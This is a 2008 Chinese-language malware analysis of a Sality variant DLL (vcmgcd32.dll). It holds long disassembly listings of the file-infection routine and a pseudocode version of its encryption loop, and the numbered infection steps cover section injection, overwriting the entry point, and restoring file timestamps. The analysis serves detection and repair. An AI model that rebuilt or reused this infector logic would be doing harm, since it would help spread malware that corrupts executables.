1000272F . A1 60900010 MOV EAX,DWORD PTR DS:[10009060] ; |
10002734 . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34] ; |
10002737 . 50 PUSH EAX ; |Arg1
10002738 . E8 33F6FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000273D . 83C4 08 ADD ESP,8
10002740 . A3 3CE20010 MOV DWORD PTR DS:[1000E23C],EAX
10002745 . 8B4D CC MOV ECX,DWORD PTR SS:[EBP-34]
10002748 . 890D 38E20010 MOV DWORD PTR DS:[1000E238],ECX
1000274E . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002751 . 8915 40E20010 MOV DWORD PTR DS:[1000E240],EDX
10002757 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
1000275A . A3 44E20010 MOV DWORD PTR DS:[1000E244],EAX
1000275F . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
10002769 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
10002773 . 6A 28 PUSH 28
10002775 . 33C9 XOR ECX,ECX
10002777 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
1000277E . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002784 . 03D1 ADD EDX,ECX
10002786 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
10002789 . 83C0 01 ADD EAX,1
1000278C . 6BC0 28 IMUL EAX,EAX,28
1000278F . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002795 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002799 . 51 PUSH ECX
1000279A . 68 E8900010 PUSH vcmgcd32.100090E8
1000279F . E8 FC1F0000 CALL vcmgcd32.100047A0
100027A4 . 83C4 0C ADD ESP,0C
100027A7 . C745 C4 13000>MOV DWORD PTR SS:[EBP-3C],13
100027AE . 33D2 XOR EDX,EDX
100027B0 . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100027B7 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
100027BD . 03C2 ADD EAX,EDX
100027BF . 33C9 XOR ECX,ECX
100027C1 . 66:8B0D 16900>MOV CX,WORD PTR DS:[10009016]
100027C8 . 6BC9 28 IMUL ECX,ECX,28
100027CB . 8B15 E4900010 MOV EDX,DWORD PTR DS:[100090E4]
100027D1 . 03D0 ADD EDX,EAX
100027D3 . 8D4411 18 LEA EAX,DWORD PTR DS:[ECX+EDX+18]
100027D7 . 3B05 64900010 CMP EAX,DWORD PTR DS:[10009064]
100027DD . 76 2D JBE SHORT vcmgcd32.1000280C
100027DF . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
100027E6 . EB 09 JMP SHORT vcmgcd32.100027F1
100027E8 > 8B4D C4 MOV ECX,DWORD PTR SS:[EBP-3C]
100027EB . 83C1 01 ADD ECX,1
100027EE . 894D C4 MOV DWORD PTR SS:[EBP-3C],ECX
100027F1 > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
100027F5 . 74 15 JE SHORT vcmgcd32.1000280C
100027F7 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
100027FA . 33C0 XOR EAX,EAX
100027FC . 66:8B0455 E89>MOV AX,WORD PTR DS:[EDX*2+100090E8]
10002804 . 85C0 TEST EAX,EAX
10002806 . 74 02 JE SHORT vcmgcd32.1000280A
10002808 . EB 02 JMP SHORT vcmgcd32.1000280C
1000280A >^ EB DC JMP SHORT vcmgcd32.100027E8
1000280C > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
10002810 . 75 4C JNZ SHORT vcmgcd32.1000285E
10002812 . 6A 28 PUSH 28
10002814 . 68 30E20010 PUSH vcmgcd32.1000E230
10002819 . 33C9 XOR ECX,ECX
1000281B . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
10002822 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002828 . 03D1 ADD EDX,ECX
1000282A . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000282D . 83C0 01 ADD EAX,1
10002830 . 6BC0 28 IMUL EAX,EAX,28
10002833 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002839 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
1000283D . 51 PUSH ECX
1000283E . E8 5D1F0000 CALL vcmgcd32.100047A0 ; add new section
10002843 . 83C4 0C ADD ESP,0C
10002846 . 8B15 60900010 MOV EDX,DWORD PTR DS:[10009060]
1000284C . 2B55 CC SUB EDX,DWORD PTR SS:[EBP-34]
1000284F . 2B15 38900010 SUB EDX,DWORD PTR DS:[10009038]
10002855 . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002858 . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000285C . EB 07 JMP SHORT vcmgcd32.10002865
1000285E > C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002865 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002868 . 25 FF000000 AND EAX,0FF
1000286D . 85C0 TEST EAX,EAX
1000286F . 0F84 4F020000 JE vcmgcd32.10002AC4
10002875 . 837D C4 00 CMP DWORD PTR SS:[EBP-3C],0
10002879 . 0F84 45020000 JE vcmgcd32.10002AC4
1000287F . 6A 28 PUSH 28
10002881 . 33C9 XOR ECX,ECX
10002883 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
1000288A . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002890 . 03D1 ADD EDX,ECX
10002892 . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
10002898 . 6BC0 28 IMUL EAX,EAX,28
1000289B . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028A1 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028A5 . 51 PUSH ECX
100028A6 . 68 30E20010 PUSH vcmgcd32.1000E230
100028AB . E8 F01E0000 CALL vcmgcd32.100047A0
100028B0 . 83C4 0C ADD ESP,0C
100028B3 . 8B15 54E20010 MOV EDX,DWORD PTR DS:[1000E254]
100028B9 . 81E2 00000080 AND EDX,80000000
100028BF . 85D2 TEST EDX,EDX
100028C1 . 75 43 JNZ SHORT vcmgcd32.10002906
100028C3 . A1 54E20010 MOV EAX,DWORD PTR DS:[1000E254]
100028C8 . 2D 00000080 SUB EAX,80000000
100028CD . A3 54E20010 MOV DWORD PTR DS:[1000E254],EAX
100028D2 . 6A 28 PUSH 28
100028D4 . 68 30E20010 PUSH vcmgcd32.1000E230
100028D9 . 33C9 XOR ECX,ECX
100028DB . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
100028E2 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
100028E8 . 03D1 ADD EDX,ECX
100028EA . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
100028F0 . 6BC0 28 IMUL EAX,EAX,28
100028F3 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028F9 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028FD . 51 PUSH ECX
100028FE . E8 9D1E0000 CALL vcmgcd32.100047A0
10002903 . 83C4 0C ADD ESP,0C
10002906 > 68 D8000000 PUSH 0D8
1000290B . 68 10900010 PUSH vcmgcd32.10009010
10002910 . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002916 . 0395 0CFFFFFF ADD EDX,DWORD PTR SS:[EBP-F4]
1000291C . 52 PUSH EDX
1000291D . E8 7E1E0000 CALL vcmgcd32.100047A0
10002922 . 83C4 0C ADD ESP,0C
10002925 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
10002928 . 0345 CC ADD EAX,DWORD PTR SS:[EBP-34]
1000292B . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
1000292E . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C] ; write new section data
10002934 . 51 PUSH ECX ; /Arg2 => 00000000
10002935 . 8B55 B0 MOV EDX,DWORD PTR SS:[EBP-50] ; |
10002938 . 52 PUSH EDX ; |Arg1
10002939 . E8 32F4FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000293E . 83C4 08 ADD ESP,8
10002941 . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
10002944 . 6A 01 PUSH 1 ; /Arg2 = 00000001
10002946 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
1000294B . E8 C0F5FFFF CALL vcmgcd32.10001F10 ; \vcmgcd32.10001F10
10002950 . 83C4 08 ADD ESP,8
10002953 . 6A 7B PUSH 7B ; save original OEP 7B bytes
10002955 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
1000295A . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
10002960 . 50 PUSH EAX
10002961 . 68 70E20010 PUSH vcmgcd32.1000E270
10002966 . E8 351E0000 CALL vcmgcd32.100047A0
/*
100047A0_fun(pDest, pSrc, dwLen);
*/
1000296B . 83C4 0C ADD ESP,0C
1000296E . 6A 7B PUSH 7B ; save to another mem
10002970 . 68 70E20010 PUSH vcmgcd32.1000E270
10002975 . 68 76960010 PUSH vcmgcd32.10009676
1000297A . E8 211E0000 CALL vcmgcd32.100047A0
1000297F . 83C4 0C ADD ESP,0C
10002982 . 6A 7B PUSH 7B ; write new 7B bytes overwrite OEP
10002984 . 8D8D 30FFFFFF LEA ECX,DWORD PTR SS:[EBP-D0]
1000298A . 51 PUSH ECX
1000298B . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002991 . 0395 18FFFFFF ADD EDX,DWORD PTR SS:[EBP-E8]
10002997 . 52 PUSH EDX
10002998 . E8 031E0000 CALL vcmgcd32.100047A0
1000299D . 83C4 0C ADD ESP,0C
100029A0 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100029AA . EB 0F JMP SHORT vcmgcd32.100029BB
100029AC > 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC] ; ???????? cf, D0 offset's data equal 11h
100029B2 . 83C0 01 ADD EAX,1
100029B5 . 8985 14FFFFFF MOV DWORD PTR SS:[EBP-EC],EAX
100029BB > 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],7C
100029C2 . 73 2A JNB SHORT vcmgcd32.100029EE
100029C4 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100029CA . 0FBE940D 30FF>MOVSX EDX,BYTE PTR SS:[EBP+ECX-D0]
100029D2 . 83FA 11 CMP EDX,11
100029D5 . 75 15 JNZ SHORT vcmgcd32.100029EC
100029D7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100029DD . 0FBE8C05 31FF>MOVSX ECX,BYTE PTR SS:[EBP+EAX-CF]
100029E5 . 83F9 11 CMP ECX,11
100029E8 . 75 02 JNZ SHORT vcmgcd32.100029EC
100029EA . EB 02 JMP SHORT vcmgcd32.100029EE
100029EC >^ EB BE JMP SHORT vcmgcd32.100029AC
100029EE > 6A 04 PUSH 4
100029F0 . 8D55 C4 LEA EDX,DWORD PTR SS:[EBP-3C]
100029F3 . 52 PUSH EDX
100029F4 . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
100029FA . 0385 14FFFFFF ADD EAX,DWORD PTR SS:[EBP-EC]
10002A00 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A06 . 03C8 ADD ECX,EAX
10002A08 . 51 PUSH ECX
10002A09 . E8 921D0000 CALL vcmgcd32.100047A0
10002A0E . 83C4 0C ADD ESP,0C
10002A11 . FF15 30100010 CALL DWORD PTR DS:[<&KERNEL32.GetTickCount>] ; [GetTickCount
10002A17 . 0345 B8 ADD EAX,DWORD PTR SS:[EBP-48]
10002A1A . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002A1D . 6BC0 03 IMUL EAX,EAX,3
10002A20 . 66:8945 B4 MOV WORD PTR SS:[EBP-4C],AX ; Get 随机 加/解密因子
10002A24 . 6A 02 PUSH 2
10002A26 . 8D55 B4 LEA EDX,DWORD PTR SS:[EBP-4C]
10002A29 . 52 PUSH EDX
10002A2A . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
10002A30 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A36 . 8D5401 77 LEA EDX,DWORD PTR DS:[ECX+EAX+77] ; write 加/解密因子 to 77h position(OEP)
10002A3A . 52 PUSH EDX
10002A3B . E8 601D0000 CALL vcmgcd32.100047A0
10002A40 . 83C4 0C ADD ESP,0C
10002A43 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],2800 ; decode O_OEP data
10002A4D . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002A54 > 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C] ; 加/解密因子
10002A57 . 25 FFFF0000 AND EAX,0FFFF
10002A5C . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A62 . 0FAFC8 IMUL ECX,EAX
10002A65 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
10002A6B . D1E2 SHL EDX,1
10002A6D . 2BCA SUB ECX,EDX
10002A6F . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A72 . 66:8B1445 E89>MOV DX,WORD PTR DS:[EAX*2+100090E8]
10002A7A . 66:33D1 XOR DX,CX
10002A7D . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A80 . 66:891445 E89>MOV WORD PTR DS:[EAX*2+100090E8],DX
10002A88 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A8E . 83E9 01 SUB ECX,1
10002A91 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
10002A97 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
10002A9A . 83C2 01 ADD EDX,1
10002A9D . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002AA0 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],0
10002AA7 .^ 75 AB JNZ SHORT vcmgcd32.10002A54
/* 加密算法
dwEC = 0x2800;
dw3C = 0;
LOOP1:
dwEax = dw4C;//加/解密因子
dwEax = dwEax AND 0xFFFF
dwEcx = dwEC;
dwEcx *= dwEax;
dwEdx = dwEC;
dwEdx = dwEdx << 1;
dwEcx -= dwEdx;
dwEax = dw3C;
dwEdx = [100090E8 + dwEax * 2];
dwDx = dwDx XOR dwCX;
dwEax = dw3C;
[100090E8 + dwEax * 2] = dwDx;
dwEcx = dwEC;
dwEcx--;
dwEC = dwEcx;
dwEdx = dw3C;
dw3d++;
dw3C = dwEdx;
if dwEC != 0 then
goto LOOP1;
*/
10002AA9 . 68 00500000 PUSH 5000
10002AAE . 68 E8900010 PUSH vcmgcd32.100090E8
10002AB3 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002AB8 . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002ABB . 50 PUSH EAX
10002ABC . E8 DF1C0000 CALL vcmgcd32.100047A0 ; 重写最后一节数据()
10002AC1 . 83C4 0C ADD ESP,0C
10002AC4 > 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002ACA . 51 PUSH ECX ; /BaseAddress => NULL
10002ACB . FF15 78100010 CALL DWORD PTR DS:[<&KERNEL32.UnmapViewOfFile>] ; \UnmapViewOfFile
10002AD1 . 8B15 10E20010 MOV EDX,DWORD PTR DS:[1000E210]
10002AD7 . 52 PUSH EDX ; /hObject => NULL
10002AD8 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002ADE . 6A 00 PUSH 0 ; /Origin = FILE_BEGIN
10002AE0 . 6A 00 PUSH 0 ; |pOffsetHi = NULL
10002AE2 . 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-50] ; |
10002AE5 . 50 PUSH EAX ; |OffsetLo
10002AE6 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
10002AEC . 51 PUSH ECX ; |hFile
10002AED . FF15 88100010 CALL DWORD PTR DS:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
10002AF3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC]
10002AF9 . 52 PUSH EDX ; /hFile
10002AFA . FF15 84100010 CALL DWORD PTR DS:[<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile
10002B00 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
10002B06 . 50 PUSH EAX ; /pLastWrite
10002B07 . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
10002B0A . 51 PUSH ECX ; |pLastAccess
10002B0B . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
10002B0E . 52 PUSH EDX ; |pCreationTime
10002B0F . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
10002B15 . 50 PUSH EAX ; |hFile
10002B16 . FF15 F8100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; \SetFileTime
10002B1C > 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC]
10002B22 . 51 PUSH ECX ; /hObject
10002B23 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002B29 . 8B55 D8 MOV EDX,DWORD PTR SS:[EBP-28]
10002B2C . 52 PUSH EDX ; /FileAttributes
10002B2D . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002B30 . 50 PUSH EAX ; |FileName
10002B31 . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002B37 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B3E . EB 10 JMP SHORT vcmgcd32.10002B50
10002B40 . B8 01000000 MOV EAX,1
10002B45 . C3 RETN
10002B46 . 8B65 E8 MOV ESP,DWORD PTR SS:[EBP-18]
10002B49 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B50 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002B53 . 25 FF000000 AND EAX,0FF
10002B58 > 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]
10002B5B . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
10002B62 . 5F POP EDI
10002B63 . 5E POP ESI
10002B64 . 5B POP EBX
10002B65 . 8BE5 MOV ESP,EBP
10002B67 . 5D POP EBP
10002B68 . C3 RETN
三、修复程序Demo
RepairSalityQ.rar
* 文件名:vcmgcd32.dll
* MD5:ae22ca9f11ade8e362254b452cc07f78
* 壳:未加
* By Vincent.peng on 2008.04.08
*/
调试方法:
在Fun为10003FF0的CreateThread断下,然后转EIP到10003FF0处。
一、感染过程分析:
1 保存文件属性、时间。
2 设置文件属性为文档。
3 得到文件大小:
感染1000B ~ 1400000B之间的exe文件。
4 计算出OEP的文件偏移地址。
5 修改PE头、节表:
1) 修改NtHeaders->OptionalHeader.SizeOfImage、NtHeaders->FileHeader.NumberOfSections。
2) 新增一节表头:节名为文件名(去扩展名)的最后一字符与code, 或date, 或rdate, 或text, 或UPX等字符串的组合。
6 申请一段内存空间保存原始OEP(7B字节)和新增加节的数据内容,并用随机因子加密。
7 用自解密算法(7B字节)替换原OEP开始的7B个字节。
8 将新节追加到文件尾部。
9 还原文件属性、时间。
此变种有个BUG,就是被感染的程序无法运行。因为被感染文件运行、自解密后,没有还原原始OEP及JMP的代码。
二、感染代码:
10002020 $ 55 PUSH EBP
10002021 . 8BEC MOV EBP,ESP
10002023 . 6A FF PUSH -1
10002025 . 68 58110010 PUSH vcmgcd32.10001158
1000202A . 68 48460010 PUSH vcmgcd32.10004648 ; SE 处理程序安装
1000202F . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
10002035 . 50 PUSH EAX
10002036 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
1000203D . 81C4 08FFFFFF ADD ESP,-0F8
10002043 . 53 PUSH EBX
10002044 . 56 PUSH ESI
10002045 . 57 PUSH EDI
10002046 . 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP
10002049 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
10002053 . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
1000205A . C785 10FFFFFF>MOV DWORD PTR SS:[EBP-F0],0
10002064 . C785 24FFFFFF>MOV DWORD PTR SS:[EBP-DC],0
1000206E . C785 18FFFFFF>MOV DWORD PTR SS:[EBP-E8],0
10002078 . C745 AC 00000>MOV DWORD PTR SS:[EBP-54],0
1000207F . C785 2CFFFFFF>MOV DWORD PTR SS:[EBP-D4],0
10002089 . C785 08FFFFFF>MOV DWORD PTR SS:[EBP-F8],0
10002093 . C745 E4 00000>MOV DWORD PTR SS:[EBP-1C],0
1000209A . C745 E0 00000>MOV DWORD PTR SS:[EBP-20],0
100020A1 . C745 CC 00500>MOV DWORD PTR SS:[EBP-34],5000
100020A8 . 66:C745 B4 00>MOV WORD PTR SS:[EBP-4C],0
100020AE . B9 1F000000 MOV ECX,1F
100020B3 . BE 286A0010 MOV ESI,vcmgcd32.10006A28
100020B8 . 8DBD 30FFFFFF LEA EDI,DWORD PTR SS:[EBP-D0]
100020BE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
100020C0 . C645 DC 00 MOV BYTE PTR SS:[EBP-24],0
100020C4 . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
100020CB . 833D 048B0010>CMP DWORD PTR DS:[10008B04],0
100020D2 . 74 47 JE SHORT vcmgcd32.1000211B
100020D4 . 68 04010000 PUSH 104 ; /WideBufSize = 104 (260.)
100020D9 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |WideCharBuf = vcmgcd32.1000E270
100020DE . 6A FF PUSH -1 ; |StringSize = FFFFFFFF (-1.)
100020E0 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
100020E3 . 50 PUSH EAX ; |StringToMap
100020E4 . 6A 00 PUSH 0 ; |Options = 0
100020E6 . 6A 00 PUSH 0 ; |CodePage = CP_ACP
100020E8 . FF15 98100010 CALL DWORD PTR DS:[<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar
100020EE . 68 70E20010 PUSH vcmgcd32.1000E270
100020F3 . 6A 00 PUSH 0
100020F5 . FF15 048B0010 CALL DWORD PTR DS:[10008B04] ; sfc_os.SfcIsFileProtected
100020FB . 85C0 TEST EAX,EAX
100020FD . 74 1C JE SHORT vcmgcd32.1000211B
100020FF . C785 00FFFFFF>MOV DWORD PTR SS:[EBP-100],0
10002109 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002110 . 8B85 00FFFFFF MOV EAX,DWORD PTR SS:[EBP-100]
10002116 . E9 3D0A0000 JMP vcmgcd32.10002B58
1000211B > 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
1000211E . 51 PUSH ECX ; /FileName
1000211F . FF15 3C100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileAttributesA>] ; \GetFileAttributesA
10002125 . 8945 D8 MOV DWORD PTR SS:[EBP-28],EAX
10002128 . 6A 20 PUSH 20 ; /FileAttributes = ARCHIVE
1000212A . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
1000212D . 52 PUSH EDX ; |FileName
1000212E . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002134 . 85C0 TEST EAX,EAX
10002136 . 75 1C JNZ SHORT vcmgcd32.10002154
10002138 . C785 FCFEFFFF>MOV DWORD PTR SS:[EBP-104],0
10002142 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002149 . 8B85 FCFEFFFF MOV EAX,DWORD PTR SS:[EBP-104]
1000214F . E9 040A0000 JMP vcmgcd32.10002B58
10002154 > 6A 00 PUSH 0 ; /hTemplateFile = NULL
10002156 . 68 80000000 PUSH 80 ; |Attributes = NORMAL
1000215B . 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING
1000215D . 6A 00 PUSH 0 ; |pSecurity = NULL
1000215F . 6A 00 PUSH 0 ; |ShareMode = 0
10002161 . 68 000000C0 PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
10002166 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002169 . 50 PUSH EAX ; |FileName
1000216A . FF15 6C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; \CreateFileA
10002170 . 8985 04FFFFFF MOV DWORD PTR SS:[EBP-FC],EAX
10002176 . 6A 00 PUSH 0 ; /pFileSizeHigh = NULL
10002178 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
1000217E . 51 PUSH ECX ; |hFile
1000217F . FF15 68100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileSize>] ; \GetFileSize
10002185 . 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX
10002188 . 83BD 04FFFFFF>CMP DWORD PTR SS:[EBP-FC],-1
1000218F . 0F84 87090000 JE vcmgcd32.10002B1C
10002195 . 817D B8 00004>CMP DWORD PTR SS:[EBP-48],1400000
1000219C . 0F83 7A090000 JNB vcmgcd32.10002B1C
100021A2 . 817D B8 00100>CMP DWORD PTR SS:[EBP-48],1000
100021A9 . 0F86 6D090000 JBE vcmgcd32.10002B1C
100021AF . 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-48]
100021B2 . 8955 B0 MOV DWORD PTR SS:[EBP-50],EDX
100021B5 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
100021BB . 50 PUSH EAX ; /pLastWrite
100021BC . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
100021BF . 51 PUSH ECX ; |pLastAccess
100021C0 . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
100021C3 . 52 PUSH EDX ; |pCreationTime
100021C4 . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
100021CA . 50 PUSH EAX ; |hFile
100021CB . FF15 90100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileTime>] ; \GetFileTime
100021D1 . 6A 00 PUSH 0 ; /MapName = NULL
100021D3 . 8B4D B8 MOV ECX,DWORD PTR SS:[EBP-48] ; |
100021D6 . 81C1 00500000 ADD ECX,5000 ; |
100021DC . 51 PUSH ECX ; |MaximumSizeLow
100021DD . 6A 00 PUSH 0 ; |MaximumSizeHigh = 0
100021DF . 6A 04 PUSH 4 ; |Protection = PAGE_READWRITE
100021E1 . 6A 00 PUSH 0 ; |pSecurity = NULL
100021E3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC] ; |
100021E9 . 52 PUSH EDX ; |hFile
100021EA . FF15 8C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileMappingA>] ; \CreateFileMappingA
100021F0 . A3 10E20010 MOV DWORD PTR DS:[1000E210],EAX
100021F5 . 833D 10E20010>CMP DWORD PTR DS:[1000E210],0
100021FC . 0F84 C2080000 JE vcmgcd32.10002AC4
10002202 . 6A 00 PUSH 0 ; /MapSize = 0
10002204 . 6A 00 PUSH 0 ; |OffsetLow = 0
10002206 . 6A 00 PUSH 0 ; |OffsetHigh = 0
10002208 . 6A 02 PUSH 2 ; |AccessMode = FILE_MAP_WRITE
1000220A . A1 10E20010 MOV EAX,DWORD PTR DS:[1000E210] ; |
1000220F . 50 PUSH EAX ; |hMapObject => NULL
10002210 . FF15 7C100010 CALL DWORD PTR DS:[<&KERNEL32.MapViewOfFile>] ; \MapViewOfFile
10002216 . A3 94E60010 MOV DWORD PTR DS:[1000E694],EAX
1000221B . 833D 94E60010>CMP DWORD PTR DS:[1000E694],0 ; if a empty file
10002222 . 0F84 9C080000 JE vcmgcd32.10002AC4
10002228 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000222E . 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C] ; point to pe offset
10002231 . 8995 0CFFFFFF MOV DWORD PTR SS:[EBP-F4],EDX
10002237 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
1000223D . 3B45 B8 CMP EAX,DWORD PTR SS:[EBP-48]
10002240 . 0F83 7E080000 JNB vcmgcd32.10002AC4
10002246 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000224C . 0FBE51 18 MOVSX EDX,BYTE PTR DS:[ECX+18] ; infected flag??
10002250 . 83FA 40 CMP EDX,40
10002253 . 0F8C 6B080000 JL vcmgcd32.10002AC4
10002259 . 68 D8000000 PUSH 0D8
1000225E . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002263 . 0385 0CFFFFFF ADD EAX,DWORD PTR SS:[EBP-F4]
10002269 . 50 PUSH EAX
1000226A . 68 10900010 PUSH vcmgcd32.10009010
1000226F . E8 2C250000 CALL vcmgcd32.100047A0
10002274 . 83C4 0C ADD ESP,0C
10002277 . 813D 10900010>CMP DWORD PTR DS:[10009010],4550
10002281 . 0F85 3D080000 JNZ vcmgcd32.10002AC4
10002287 . 33C9 XOR ECX,ECX
10002289 . 66:8B0D 28900>MOV CX,WORD PTR DS:[10009028] ; GetMagicNumber
10002290 . 81F9 0B010000 CMP ECX,10B
10002296 . 0F85 28080000 JNZ vcmgcd32.10002AC4
